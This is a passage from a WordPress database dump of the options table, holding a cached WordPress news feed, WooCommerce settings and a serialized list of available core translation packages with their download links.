href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>. Thanks for choosing WordPress. See you soon for version 4.1!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/09/benny/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 22 Mar 2015 22:32:58 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:10:\"x-pingback\";s:37:\"https://wordpress.org/news/xmlrpc.php\";s:13:\"last-modified\";s:29:\"Thu, 19 Mar 2015 19:30:08 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(379,'_transient_woocommerce_webhook_ids','a:0:{}','yes'),(380,'woocommerce_admin_notices','a:1:{i:0;s:13:\"theme_support\";}','yes'),(393,'woocommerce_allow_tracking','yes','yes'),(471,'_site_transient_timeout_browser_c761a21b9773e489f3446587451d3490','1425157834','yes'),(472,'_site_transient_browser_c761a21b9773e489f3446587451d3490','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"40.0.2214.111\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(519,'_site_transient_timeout_available_translations','1424739305','yes'),(520,'_site_transient_available_translations','a:50:{s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:24\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-27 15:23:28\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 11:10:33\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:22:\"Продължение\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-08 17:39:56\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-22 09:58:04\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-09 11:12:57\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 22:27:33\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Fortsæt\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-04 12:59:40\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 11:05:07\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-19 14:43:26\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 20:53:36\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-28 01:01:02\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-05 09:59:30\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 13:11:32\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-05 15:18:10\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 21:05:39\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-19 08:14:32\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-04 19:47:01\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.0/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-09 12:20:08\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-23 14:29:09\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-17 07:01:16\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:48\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-05 17:37:43\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.0/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 18:37:43\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-12 01:05:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1.1/haz.zip\";s:3:\"iso\";a:2:{i:1;s:3:\"haz\";i:2;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-29 14:11:31\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"להמשיך\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-20 16:50:00\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-15 20:01:36\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Tovább\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-31 07:30:24\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-21 07:43:12\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-29 10:53:40\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-21 03:05:42\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-08 00:36:50\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-23 10:05:46\";s:12:\"english_name\";s:7:\"Burmese\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ေဆာင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 11:09:37\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-18 13:44:24\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-16 15:47:22\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-02 11:59:53\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-19 19:37:03\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-19 16:51:24\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-17 18:16:58\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-12 19:18:28\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-13 22:38:48\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Nadaljujte\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-18 19:08:01\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-29 09:41:07\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-11 11:46:46\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.1/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-01-19 08:42:08\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-19 05:33:04\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:9:\"Uyƣurqə\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"4.1.1\";s:7:\"updated\";s:19:\"2015-02-19 08:39:08\";s:12:\"english_name\";s:16:\"Chinese 